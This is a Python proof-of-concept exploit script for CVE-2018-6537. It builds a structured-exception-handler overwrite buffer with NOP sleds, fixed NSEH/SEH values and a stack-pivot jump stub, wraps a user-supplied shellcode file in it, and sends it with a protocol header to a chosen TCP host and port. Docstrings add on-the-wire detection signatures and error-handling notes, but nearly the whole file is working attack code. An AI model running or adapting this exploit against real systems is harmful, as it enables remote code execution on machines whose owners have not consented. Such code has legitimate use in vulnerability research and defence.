from argparse import ArgumentParser
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack
class Exploit:
    """PoC for CVE-2018-6537: wraps a payload file in a fixed-layout buffer
    and writes it, behind a constant header, to one TCP endpoint.

    Everything here is hard-coded (offsets, the two dwords in the NSEH/SEH
    slots, the 12-byte header prefix), so the script is tied to a single
    target build. From a detection standpoint the constant header bytes
    (``75 19 ba ab 03 00 00 00 00 40 00 00``) and the long runs of 0x41 /
    0x90 that ``make`` emits are the stable on-the-wire characteristics.
    """

    def __init__(self) -> None:
        """Parse ``--host``, ``--port`` and ``--file`` from ``sys.argv``.

        All three options are required; ``argparse`` exits the process when
        one is missing. ``int(args.port)`` raises ``ValueError`` for a
        non-numeric port — there is no range check.
        """
        parser = ArgumentParser()
        # One required string option per name (``store`` is argparse's default action).
        for arg in ("host", "port", "file"):
            parser.add_argument(
                f"--{arg}",
                action = "store",
                required = True
            )
        args = parser.parse_args()
        self.port: int = int(args.port)
        self.host: str = args.host
        self.file: str = args.file

    def make(self, buf: bytes) -> bytes:
        """Return ``buf`` embedded in the fixed 1000-byte payload layout.

        ``buf`` is first prefixed with 16 bytes of 0x90 and then 0x41-padded
        out to 400 bytes. The outer buffer is 124 bytes of 0x41, the NSEH and
        SEH dwords, a 2-byte 0x90 gap, a 7-byte stub, 0x90 filler up to
        ``1000 - len(buf)``, and finally ``buf``.

        The two padding multipliers are not clamped: a ``buf`` that exceeds
        400 bytes (or pushes the total past 1000) makes the corresponding
        ``bytes * n`` empty, so the returned length no longer matches the
        layout described above.
        """
        # prefix nops for stack interactions
        buf = b'\x90' * 16 + buf
        buf += b'\x41' * (400 - len(buf))
        # bytecode
        buffer = b'\x41' * 124
        # Both dwords are fixed constants — presumably specific to the build
        # the CVE was reported against; TODO confirm which version.
        buffer += pack("<I", 0x06eb9090) # NSEH
        buffer += pack("<I", 0x1015a2f0) # SEH
        buffer += b'\x90' * 2
        buffer += b"\x66\x81\xc4\x70\x0e"
        buffer += b"\xff\xe4"
        # Filler sized so that ``buffer + buf`` totals exactly 1000 bytes when
        # ``buf`` fits (see the docstring for the unclamped case).
        buffer += b'\x90' * (1000 - len(buffer) - len(buf))
        buffer += buf
        return buffer

    def send(self, buffer: bytes) -> None:
        """Connect to ``self.host:self.port`` over TCP and send header + ``buffer``.

        The 24-byte header is a constant 12-byte prefix followed by three
        little-endian dwords: ``len(buffer)`` twice and the integer value of
        the payload's last byte (``buffer[-1]``; raises ``IndexError`` on an
        empty ``buffer``). Any exception from ``connect``/``send`` is printed
        and swallowed, so the caller cannot observe a failed delivery, and a
        partial ``send`` (fewer bytes than requested) goes unreported too.
        """
        # program header (prefixed)
        header = b"\x75\x19\xba\xab"
        header += b"\x03\x00\x00\x00"
        header += b"\x00\x40\x00\x00"
        header += pack('<I', len(buffer))
        header += pack('<I', len(buffer))
        header += pack('<I', buffer[-1])
        # ``with`` closes the socket on every exit path, including the except branch.
        with socket(AF_INET, SOCK_STREAM) as sock:
            try:
                sock.connect((self.host, self.port))
                sock.send(header + buffer)
            except Exception as e:
                print(f"couldn't connect: {e}")

    def main(self) -> None:
        """Read ``self.file`` as raw bytes, build the payload with ``make`` and deliver it via ``send``."""
        with open(self.file, 'rb') as file:
            self.send(self.make(file.read()))
if __name__ == "__main__":
    # Script entry point: parse the CLI, then build and deliver the payload.
    _ = Exploit()
    _.main()